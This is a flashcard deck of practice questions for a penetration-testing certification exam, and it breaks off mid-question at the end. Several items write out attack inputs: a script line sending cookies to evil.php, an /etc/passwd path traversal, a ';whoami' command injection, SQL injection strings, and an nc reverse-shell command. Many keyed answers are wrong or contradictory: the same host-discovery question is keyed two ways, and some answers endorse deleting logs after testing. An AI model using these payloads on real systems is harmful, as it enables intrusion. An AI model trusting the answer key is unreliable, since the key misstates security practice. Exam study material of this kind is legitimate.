Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Exam Study Questions 2 > Exam Study Questions > Flashcards

Exam Study Questions Flashcards

1
Q

A tester who is performing a penetration test on a website receives the following output:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/search.php on line 62
Which of the following commands can be used to further attack the website?
A. 

var adr = '../evil.php?test=' + escape(document.cookie);

B. ../../../../../../../../../../etc/passwd
C. /var/www/html/index.php;whoami
D. 1 UNION SELECT 1, DATABASE (), 3 –
A

D. 1 UNION SELECT 1, DATABASE (), 3 –

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

A penetration tester has established an on-path position between a target host and local network services but has not been able to establish an on-path position between the target host and the Internet. Regardless, the tester would like to subtly redirect HTTP connections to a spoofed server IP. Which of the following methods would BEST support the objective?

A. Gain access to the target host and implant malware specially crafted for this purpose.
B. Exploit the local DNS server and add/update the zone records with a spoofed A record.
C. Use the Scapy utility to overwrite name resolution fields in the DNS query response.
D. Proxy HTTP connections from the target host to that of the spoofed host.

A

D. Proxy HTTP connections from the target host to that of the spoofed host.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Which of the following types of information would MOST likely be included in an application security assessment report addressed to developers? (Choose two.)
A. Use of non-optimized sort functions
B. Poor input sanitization
C. Null pointer dereferences
D. Non-compliance with code style guide
E. Use of deprecated Javadoc tags
F. A cydomatic complexity score of 3

A

B. Poor input sanitization
C. Null pointer dereferences

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

A penetration tester has found indicators that a privileged user’s password might be the same on 30 different Linux systems. Which of the following tools can help the tester identify the number of systems on which the password can be used?
A. Hydra
B. John the Ripper
C. Cain and Abel
D. Medusa

A

D. Medusa

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

A penetration tester was able to compromise a server and escalate privileges. Which of the following should the tester perform AFTER concluding the activities on the specified target? (Choose two.)
A. Remove the logs from the server.
B. Restore the server backup.
C. Disable the running services.
D. Remove any tools or scripts that were installed.
E. Delete any created credentials.
F. Reboot the target server.

A

C. Disable the running services.
E. Delete any created credentials.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

A penetration tester is reviewing the following DNS reconnaissance results for comptia.org from dig:

;; ANSWER SECTION
comptia.org. 3569 IN MX comptia.org-mail.protection.outlook.com. comptia.org. 3569 IN A 3.219.13.186. comptia.org. 3569 IN NS ns1.comptia.org. comptia.org. 3569 IN SOA haven. administrator.comptia.org. comptia.org. 3569 IN MX new.mx0.comptia.org. comptia.org. 3569 IN MX new.mx1.comptia.org.
Which of the following potential issues can the penetration tester identify based on this output?

A. At least one of the records is out of scope.
B. There is a duplicate MX record.
C. The NS record is not within the appropriate domain.
D. The SOA records outside the comptia.org domain.

A

A. At least one of the records is out of scope.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?
A. tcpdump
B. Snort
C. Nmap
D. Netstat
E. Fuzzer

A

C. Nmap

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Deconfliction is necessary when the penetration test:
A. determines that proprietary information is being stored in cleartext.
B. occurs during the monthly vulnerability scanning.
C. uncovers indicators of prior compromise over the course of the assessment.
D. proceeds in parallel with a criminal digital forensic investigation.

A

C. uncovers indicators of prior compromise over the course of the assessment.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

A penetration tester wants to test a list of common passwords against the SSH daemon on a network device. Which of the following tools would be BEST to use for this purpose?
A. Hashcat
B. Mimikatz
C. Patator
D. John the Ripper

A

C. Patator

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

PCI DSS requires which of the following as part of the penetration-testing process?

A. The penetration tester must have cybersecurity certifications.
B. The network must be segmented.
C. Only externally facing systems should be tested.
D. The assessment must be performed during non-working hours.

A

B. The network must be segmented.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

A penetration tester completed an assessment, removed all artifacts and accounts created during the test, and presented the findings to the client. Which of the following happens NEXT?

A. The penetration tester conducts a retest.
B. The penetration tester deletes all scripts from the client machines.
C. The client applies patches to the systems.
D. The client clears system logs generated during the test.

A

C. The client applies patches to the systems.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

A penetration tester is examining a Class C network to identify active systems quickly. Which of the following commands should the penetration tester use?
A. nmap -sn 192.168.0.1/16
B. nmap -sn 192.168.0.1-254
C. nmap -sn 192.168.0.1 192.168.0.1.254
D. nmap -sN 192.168.0.0/24

A

B. nmap -sn 192.168.0.1-254

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

A penetration tester wants to validate the effectiveness of a DLP product by attempting exfiltration of data using email attachments. Which of the following techniques should the tester select to accomplish this task?
A. Steganography
B. Metadata removal
C. Encryption
D. Encode64

A

A. Steganography

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

A penetration tester received a 16-bit network block that was scoped for an assessment. During the assessment, the tester realized no hosts were active in the provided block of IPs and reported this to the company. The company then provided an updated block of IPs to the tester. Which of the following would be the most appropriate NEXT step?
A. Terminate the contract.
B. Update the ROE with new signatures.
C. Scan the 8-bit block to map additional missed hosts.
D. Continue the assessment.

A

B. Update the ROE with new signatures.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

A. Add a dependency checker into the tool chain.
B. Perform routine static and dynamic analysis of committed code.
C. Validate API security settings before deployment.
D. Perform fuzz testing of compiled binaries.

A

A. Add a dependency checker into the tool chain.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

A penetration tester needs to access a building that is guarded by locked gates, a security team, and cameras. Which of the following is a technique the tester can use to gain access to the IT framework without being detected?
A. Pick a lock.
B. Disable the cameras remotely.
C. Impersonate a package delivery worker.
D. Send a phishing email.

A

D. Send a phishing email.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

A penetration tester is assessing a wireless network. Although monitoring the correct channel and SSID, the tester is unable to capture a handshake between the clients and the AP. Which of the following attacks is the MOST effective to allow the penetration tester to capture a handshake?
A. Key reinstallation
B. Deauthentication
C. Evil twin
D. Replay

A

B. Deauthentication

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

A company that requires minimal disruption to its daily activities needs a penetration tester to perform information gathering around the company’s web presence.
Which of the following would the tester find MOST helpful in the initial information-gathering steps? (Choose two.)
A. MX records
B. Zone transfers
C. DNS forward and reverse lookups
D. Internet search engines
E. Externally facing open ports
F. Shodan results

A

D. Internet search engines
F. Shodan results

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host delivery and write the discovery to files without returning results of the attack machine?

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt

B. nmap -iR 10 -n -oX out.xml | grep “Nmap” | cut -d “” -f5 > live-hosts.txt

C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service

D. nmap -sS -Pn -n -iL target.txt -oA target_txtl

A

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

A customer adds a requirement to the scope of a penetration test that states activities can only occur during normal business hours. Which of the following BEST describes why this would be necessary?
A. To meet PCI DSS testing requirements
B. For testing of the customer’s SLA with the ISP
C. Because of concerns regarding bandwidth limitations
D. To ensure someone is available if something goes wrong

A

D. To ensure someone is available if something goes wrong

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

An assessor wants to use Nmap to help map out a stateful firewall rule set. Which of the following scans will the assessor MOST likely run?
A. nmap -sA 192.168.0.1/24
B. nmap -sS 192.168.0.1/24
C. nmap -oG 192.168.0.1/24
D. nmap 192.168.0.1/24

A

B. nmap -sS 192.168.0.1/24

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

During the scoping phase of an assessment, a client requested that any remote code exploits discovered during testing would be reported immediately so the vulnerability could be fixed as soon as possible. The penetration tester did not agree with this request, and after testing began, the tester discovered a vulnerability and gained internal access to the system. Additionally, this scenario led to a loss of confidential credit card data and a hole in the system. At the end of the test, the penetration tester willfully failed to report this information and left the vulnerability in place. A few months later, the client was breached and credit card data was stolen. After being notified about the breach, which of the following steps should the company take NEXT?

A. Deny that the vulnerability existed
B. Investigate the penetration tester.
C. Accept that the client was right.
D. Fire the penetration tester.

A

B. Investigate the penetration tester.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

A penetration tester is contracted to attack an oil rig network to look for vulnerabilities. While conducting the assessment, the support organization of the rig reported issues connecting to corporate applications and upstream services for data acquisitions. Which of the following is the MOST likely culprit?

A. Patch installations
B. Successful exploits
C. Application failures
D. Bandwidth limitations

A

D. Bandwidth limitations

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

A penetration tester has identified several newly released CVEs on a VoIP call manager. The scanning tool the tester used determined the possible presence of the CVEs based off the number of the service. Which of the following methods would BEST support validation of the possible findings?

A. Manually check the version number of the VoIP service against the CVE release.
B. Test with proof-of-concept code from an exploit database on a non-production system.
C. Review SIP traffic from an on-path position to look for indicators of compromise.
D. Execute an nmap -sV scan against the service.

A

A. Manually check the version number of the VoIP service against the CVE release.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

Which of the following are the MOST important items for prioritizing fixes that should be included in the final report for a penetration test? (Choose two.)

A. The CVSS score of the finding
B. The network location of the vulnerable device
C. The vulnerability identifier
D. The client acceptance form
E. The name of the person who found the flaw
F. The tool used to find the issue

A

A. The CVSS score of the finding
C. The vulnerability identifier

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

User credentials were captured from a database during an assessment and cracked using rainbow tables Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2

A

A. MD5

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

A penetration tester is testing a web application that is hosted by a public cloud provider. The tester is able to query the provider’s metadata and get the credentials used by the instance to authenticate itself. Which of the following vulnerabilities has the tester exploited?

A. Cross-site request forgery
B. Server-side request forgery
C. Remote file inclusion
D. Local code inclusion

A

B. Server-side request forgery

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

A penetration tester was contracted to test a proprietary application for buffer overflow vulnerabilities. Which of the following tools would be BEST suited for this task?

A. GDB
B. Burp Suite
C. SearchSpliot
D. Netcat

A

A. GDB

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

Which of the following would assist a penetration tester the MOST when evaluating the susceptibility of top-level executives to social engineering attacks?

A. Scraping social media for personal details
B. Registering domain names that are similar to the target company’s
C. Identifying technical contacts at the company
D. Crawling the company’s website for company information

A

A. Scraping social media for personal details

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

A penetration-testing team needs to test the security of electronic records in a company’s office. Per the terms of engagement, the penetration test is to be conducted after hours and should not include circumventing the alarm or performing destructive entry. During outside reconnaissance, the team sees an open door from an adjoining building. Which of the following would be allowed under the terms of the engagement?

A. Prying the lock open on the records room
B. Climbing in an open window of the adjoining building
C. Presenting a false employee ID to the night guard
D. Obstructing the motion sensors in the hallway of the records room

A

C. Presenting a false employee ID to the night guard

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

A penetration tester discovers during a recent test that an employee in the accounting department had been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to discourage this type of activity in the future?

A. Enforce mandatory employee vacations.
B. Implement multifactor authentication.
C. Install video surveillance equipment in the office.
D. Encrypt passwords for bank account information.

A

A. Enforce mandatory employee vacations.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

A penetration tester who is working remotely is conducting a penetration test using a wireless connection. Which of the following is the BEST way to provide confidentiality for the client while using this connection?

A. Configure wireless access to use a AAA server.
B. Use random MAC addresses on the penetration testing distribution.
C. Install a host-based firewall on the penetration testing distribution.
D. Connect to the penetration testing company’s VPS using a VPN.

A

D. Connect to the penetration testing company’s VPS using a VPN.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Which of the following actions Is the penetration tester performing?

A. Privilege escalation
B. Upgrading the shell
C. Writing a script for persistence
D. Building a bind shell

A

B. Upgrading the shell

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

A penetration tester opened a shell on a laptop at a client’s office but is unable to pivot because of restrictive ACLs on the wireless subnet. The tester is also aware that all laptop users have a hard-wired connection available at their desks. Which of the following is the BEST method available to pivot and gain additional access to the network?

A. Set up a captive portal with embedded malicious code.
B. Capture handshakes from wireless clients to crack.
C. Span deauthentication packets to the wireless clients.
D. Set up another access point and perform an evil twin attack.

A

D. Set up another access point and perform an evil twin attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

A tester who is performing a penetration test discovers an older firewall that is known to have serious vulnerabilities to remote attacks but is not part of the original list of IP addresses for the engagement. Which of the following is the BEST option for the tester to take?

A. Segment the firewall from the cloud.
B. Scan the firewall for vulnerabilities.
C. Notify the client about the firewall.
D. Apply patches to the firewall.

A

C. Notify the client about the firewall.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A penetration tester is looking for vulnerabilities within a company’s web application that are in scope. The penetration tester discovers a login page and enters the following string in a field:

1;SELECT Username, Password FROM Users;

Which of the following injection attacks is the penetration tester using?

A. Blind SQL
B. Boolean SQL
C. Stacked queries
D. Error-based

A

C. Stacked queries

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which of the following can be used to store alphanumeric data that can be fed into scripts or programs as input to penetration-testing tools?

A. Dictionary
B. Directory
C. Symlink
D. Catalog
E. For-loop

A

A. Dictionary

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

A. inurl:
B. link:
C. site:
D. intitle:

A

C. site:

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client’s expectations?

A. OWASP Top 10
B. MITRE ATT&CK framework
C. NIST Cybersecurity Framework
D. The Diamond Model of Intrusion Analysis

A

B. MITRE ATT&CK framework

40
Q

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

A. The SSL certificates were invalid.
B. The tester IP was blocked.
C. The scanner crashed the system.
D. The web page was not found.

A

B. The tester IP was blocked.

41
Q

A red team completed an engagement and provided the following example in the report to describe how the team gained access to a web server:

x’ OR role LIKE ‘%admin%

Which of the following should be recommended to remediate this vulnerability?

A. Multifactor authentication
B. Encrypted communications
C. Secure software development life cycle
D. Parameterized queries

A

D. Parameterized queries

42
Q

Which of the following documents is agreed upon by all parties associated with the penetration-testing engagement and defines the scope, contacts, costs, duration, and deliverables?

A. SOW
B. SLA
C. MSA
D. NDA

A

A. SOW

43
Q

In Python socket programming, SOCK_DGRAM type is:

A. reliable.
B. matrixed.
C. connectionless.
D. slower.

A

C. connectionless.

44
Q

Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?

A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures

A

B. Remediation

45
Q

Which of the following types of assessments MOST likely focuses on vulnerabilities with the objective to access specific data?

A. An unknown-environment assessment
B. A known-environment assessment
C. A red-team assessment
D. A compliance-based assessment

A

C. A red-team assessment

46
Q

A penetration tester initiated the transfer of a large data set to verify a proof-of-concept attack as permitted by the ROE. The tester noticed the client’s data included PII, which is out of scope, and immediately stopped the transfer. Which of the following MOST likely explains the penetration tester’s decision?

A. The tester had the situational awareness to stop the transfer.
B. The tester found evidence of prior compromise within the data set.
C. The tester completed the assigned part of the assessment workflow.
D. The tester reached the end of the assessment time frame.

A

A. The tester had the situational awareness to stop the transfer.

47
Q

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https

A

D. windows/x64/powershell_reverse_tcp

48
Q

A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction

A

D. Deconfliction

49
Q

Which of the following is the BEST resource for obtaining payloads against specific network infrastructure products?

A. Exploit-DB
B. Metasploit
C. Shodan
D. Retina

A

A. Exploit-DB

50
Q

A penetration tester gives the following command to a systems administrator to execute on one of the target servers:

rm -f /var/www/html/G679h32gYu.php

Which of the following BEST explains why the penetration tester wants this command executed?

A. To trick the systems administrator into installing a rootkit
B. To close down a reverse shell
C. To remove a web shell after the penetration test
D. To delete credentials the tester created

A

C. To remove a web shell after the penetration test

51
Q

A company provided the following network scope for a penetration test:

  • 169.137.1.0/24
  • 221.10.1.0/24
  • 149.14.1.0/24

A penetration tester discovered a remote command injection on IP address 149.14.1.24 and exploited the system. Later, the tester learned that this particular IP address belongs to a third party. Which of the following stakeholders is responsible for this mistake?

A. The company that requested the penetration test
B. The penetration testing company
C. The target host’s owner
D. The penetration tester
E. The subcontractor supporting the test

A

A. The company that requested the penetration test

52
Q

In an unprotected network file repository, a penetration tester discovers a text file containing usernames and passwords in cleartext and a spreadsheet containing data for 50 employees, including full names, roles, and serial numbers. The tester realizes some of the passwords in the text file follow the format: . Which of the following would be the best action for the tester to take NEXT with this information?

A. Create a custom password dictionary as preparation for password spray testing.

B. Recommend using a password manager/vault instead of text files to store passwords securely.

C. Recommend configuring password complexity rules in all the systems and applications.

D. Create a TPM-backed sealed storage location within which the unprotected file repository can be reported.

A

B. Recommend using a password manager/vault instead of text files to store passwords securely.

53
Q

During the reconnaissance phase, a penetration tester obtains the following output:

Reply from 192.168.1.23: bytes=32 time<54ms TTL=128
Reply from 192.168.1.23: bytes=32 time<53ms TTL=128
Reply from 192.168.1.23: bytes=32 time<60ms TTL=128
Reply from 192.168.1.23: bytes=32 time<51ms TTL=128

Which of the following operating systems is MOST likely installed on the host?

A. Linux -
В. NetBSD
C. Windows
D. macOS

A

C. Windows

54
Q

A penetration tester joins the assessment team in the middle of the assessment. The client has asked the team, both verbally and in the scoping document, not to test the production networks. However, the new tester is not aware of this request and proceeds to perform exploits in the production environment. Which of the following would have MOST effectively prevented this misunderstanding?

A. Prohibiting exploitation in the production environment
B. Requiring all testers to review the scoping document carefully
C. Never assessing the production networks
D. Prohibiting testers from joining the team during the assessment

A

B. Requiring all testers to review the scoping document carefully

55
Q

User credentials were captured from a database during an assessment and cracked using rainbow tables. Based on the ease of compromise, which of the following algorithms was MOST likely used to store the passwords in the database?

A. MD5
B. bcrypt
C. SHA-1
D. PBKDF2

A

A. MD5

56
Q

A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

A. The injection was too slow.
B. The DNS information was incorrect.
C. The DNS cache was not refreshed.
D. The client did not receive a trusted response.

A

C. The DNS cache was not refreshed.

57
Q

During an assessment, a penetration tester was able to access the organization’s wireless network from outside of the building using a laptop running Aircrack-ng. Which of the following should be recommended to the client to remediate this issue?

A. Changing to Wi-Fi equipment that supports strong encryption
B. Using directional antennae
C. Using WEP encryption
D. Disabling Wi-Fi

A

A. Changing to Wi-Fi equipment that supports strong encryption

58
Q

A penetration tester successfully performed an exploit on a host and was able to hop from VLAN 100 to VLAN 200. VLAN 200 contains servers that perform financial transactions, and the penetration tester now wants the local interface of the attacker machine to have a static ARP entry in the local cache. The attacker machine has the following:

IP Address: 192.168.1.63 -
Physical Address: 60-36-dd-a6-c5-33

Which of the following commands would the penetration tester MOST likely use in order to establish a static ARP entry successfully?

A. tcpdump -i eth01 arp and arp[6:2] == 2
B. arp -s 192.168.1.63 60-36-DD-A6-C5-33
C. ipconfig /all findstr /v 00-00-00 | findstr Physical
D. route add 192.168.1.63 mask 255.255.255.255.0 192.168.1.1

A

B. arp -s 192.168.1.63 60-36-DD-A6-C5-33

59
Q

During an internal penetration test against a company, a penetration tester was able to navigate to another part of the network and locate a folder containing customer information such as addresses, phone numbers, and credit card numbers. To be PCI compliant, which of the following should the company have implemented to BEST protect this data?

A. Vulnerability scanning
B. Network segmentation
C. System hardening
D. Intrusion detection

A

B. Network segmentation

60
Q

A security analyst needs to perform a scan for SMB port 445 over a/16 network. Which of the following commands would be the BEST option when stealth is not a concern and the task is time sensitive?

A. Nmap -s 445 -Pn -T5 172.21.0.0/16
B. Nmap -p 445 -n -T4 -open 172.21.0.0/16
С. Nmap -sV –script=smb* 172.21.0.0/16
D. Nmap -p 445 -max -sT 172. 21.0.0/16

A

B. Nmap -p 445 -n -T4 -open 172.21.0.0/16

61
Q

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

A. Peach
B. WinDbg
C. GDB
D. OllyDbg

A

C. GDB

62
Q

A penetration tester found several critical SQL injection vulnerabilities during an assessment of a client’s system. The tester would like to suggest mitigation to the client as soon as possible.
Which of the following remediation techniques would be the BEST to recommend? (Choose two.)

A. Closing open services
B. Encryption users’ passwords
C. Randomizing users’ credentials
D. Users’ input validation
E. Parameterized queries
F. Output encoding

A

D. Users’ input validation
E. Parameterized queries

63
Q

Which of the following is a rules engine for managing public cloud accounts and resources?

A. Cloud Custodian
B. Cloud Brute
C. Pacu
D. Scout Suite

A

A. Cloud Custodian

64
Q

A penetration tester will be performing a vulnerability scan as part of the penetration test on a client’s website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?

A. -а8 -T0
B. –script “httpvuln
C. -sn
D. -O -A

A

B. –script “httpvuln

65
Q

A penetration tester discovered that a client uses cloud mail as the company’s email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

A. Credential harvesting
B. Privilege escalation
C. Password spraying
D. Domain record abuse

A

A. Credential harvesting

66
Q

During an assessment, a penetration tester obtains a list of 30 email addresses by crawling the target company’s website and then creates a list of possible usernames based on the email address format. Which of the following types of attacks would MOST likely be used to avoid account lockout?

A. Mask
B. Rainbow
C. Dictionary
D. Password spraying

A

D. Password spraying

67
Q

The attacking machine is on the same LAN segment as the target host during an internal penetration test. Which of the following commands will BEST enable the attacker to conduct host discovery and write the discovery to files without returning results of the attack machine?

A. nmap -sn -n -exclude 10.1.1.15 10.1.1.0/24 -oA target_txt
B. nmap -iR 10 -n -oX out.xml | grep “Nmap” | cut -d “” -f5 > live-hosts.txt
C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service
D. nmap -sS -Pn -n -iL target.txt -oA target_txt1

A

C. nmap -Pn -sV -O -iL target.txt -oA target_text_Service

68
Q

Which of the following tools should a penetration tester use to crawl a website and build a wordlist using the data recovered to crack the password on the website?

A. DirBuster
B. CeWL
C. w3af
D. Patator

A

B. CeWL

69
Q

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY’00:00:05’

Which of the following should the penetration tester attempt NEXT?

A. http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell ‘whoami’

B. http://company.com/catalog.asp?productid=22’ OR 1=1 –

C. http://company.com/catalog.asp?productid=22’ UNION SELECT 1,2,3 –

D. http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

A

B. http://company.com/catalog.asp?productid=22’ OR 1=1 –

70
Q

The output from a penetration testing tool shows 100 hosts contained findings due to improper patch management. Which of the following did the penetration tester perform?

A. A vulnerability scan
B. A WHOIS lookup
C. A packet capture
D. An Nmap scan

A

A. A vulnerability scan

71
Q

During an assessment, a penetration tester gathered OSINT for one of the IT systems administrators from the target company and managed to obtain valuable information, including corporate email addresses. Which of the following techniques should the penetration tester perform NEXT?

A. Badge cloning
B. Watering-hole attack
C. Impersonation
D. Spear phishing

A

D. Spear phishing

72
Q

Which of the following compliance requirements would be BEST suited in an environment that processes credit card data?

A. PCI DSS
B. ISO 27001
C. SOX
D. GDPR

A

A. PCI DSS

73
Q

A penetration tester successfully infiltrated the targeted web server and created credentials with administrative privileges. After conducting data exfiltration, which of the following should be the tester’s NEXT step?

A. Determine what data is available on the web server.
B. Change or delete the logs.
C. Log out and migrate to a new session.
D. Log in as the new user.

A

B. Change or delete the logs.

74
Q

A penetration tester analyzed a web-application log file and discovered an input that was sent to the company’s web application. The input contains a string that says “WAITFOR.” Which of the following attacks is being attempted?

A. SQL injection
B. HTML injection
C. Remote command injection
D. DLL injection

A

A. SQL injection

75
Q

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management

A

D. Patch management

76
Q

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

A. Statement of work
B. Program scope
C. Non-disclosure agreement
D. Rules of engagement

A

D. Rules of engagement

77
Q

A penetration tester has extracted password hashes from the lsass.exe memory process. Which of the following should the tester perform NEXT to pass the hash and provide persistence with the newly acquired credentials?

A. Use Patator to pass the hash and Responder for persistence.
B. Use Hashcat to pass the hash and Empire for persistence.
C. Use a bind shell to pass the hash and WMI for persistence.
D. Use Mimikatz to pass the hash and PsExec for persistence.

A

D. Use Mimikatz to pass the hash and PsExec for persistence.

78
Q

The provision that defines the level of responsibility between the penetration tester and the client for preventing unauthorized disclosure is found in the:

A. NDA
B. SLA
C. MSA
D. SOW

A

A. NDA

79
Q

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

A. /var/log/messages
B. /var/log/last_user
C. /var/log/user_log
D. /var/log/lastlog

A

D. /var/log/lastlog

80
Q

A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?

A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
D. Public data breach dumps

A

A. WHOIS domain lookup

81
Q

Which of the following tools would BEST allow a penetration tester to capture wireless handshakes to reveal a Wi-Fi password from a Windows machine?

A. Wireshark
B. EAPHammer
C. Kismet
D. Aircrack-ng

A

D. Aircrack-ng

82
Q

A security analyst needs to perform an on-path attack on BLE smart devices. Which of the following tools would be BEST suited to accomplish this task?

A. Wireshark
B. Gattacker
C. tcpdump
D. Netcat

A

B. Gattacker

83
Q

During an assessment, a penetration tester manages to exploit an LFI vulnerability and browse the web log for a target Apache server. Which of the following steps would the penetration tester most likely try NEXT to further exploit the web server? (Choose two.)

A. Cross-site scripting
B. Server-side request forgery
C. SQL injection
D. Log poisoning
E. Cross-site request forgery
F. Command injection

A

B. Server-side request forgery
F. Command injection

84
Q

A penetration tester opened a reverse shell on a Linux web server and successfully escalated privileges to root. During the engagement, the tester noticed that another user logged in frequently as root to perform work tasks. To avoid disrupting this user’s work, which of the following is the BEST option for the penetration tester to maintain root-level persistence on this server during the test?

A. Add a web shell to the root of the website.
B. Upgrade the reverse shell to a true TTY terminal.
C. Add a new user with ID 0 to the /etc/passwd file.
D. Change the password of the root user and revert after the test.

A

C. Add a new user with ID 0 to the /etc/passwd file.

85
Q

A company requires that all hypervisors have the latest available patches installed. Which of the following would BEST explain the reason why this policy is in place?

A. To provide protection against host OS vulnerabilities
B. To reduce the probability of a VM escape attack
C. To fix any misconfigurations of the hypervisor
D. To enable all features of the hypervisor

A

B. To reduce the probability of a VM escape attack

86
Q

A penetration tester uncovers access keys within an organization’s source code management solution. Which of the following would BEST address the issue? (Choose two.)

A. Setting up a secret management solution for all items in the source code management system

B. Implementing role-based access control on the source code management system

C. Configuring multifactor authentication on the source code management system

D. Leveraging a solution to scan for other similar instances in the source code management system

E. Developing a secure software development life cycle process for committing code to the source code management system

F. Creating a trigger that will prevent developers from including passwords in the source code management system

A

A. Setting up a secret management solution for all items in the source code management system
E. Developing a secure software development life cycle process for committing code to the source code management system

87
Q

A penetration tester is conducting an assessment against a group of publicly available web servers and notices a number of TCP resets returning from one of the web servers. Which of the following is MOST likely causing the TCP resets to occur during the assessment?

A. The web server is using a WAF.
B. The web server is behind a load balancer.
C. The web server is redirecting the requests.
D. The local antivirus on the web server Is rejecting the connection.

A

A. The web server is using a WAF.

88
Q

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

A. Follow the established data retention and destruction process.
B. Report any findings to regulatory oversight groups.
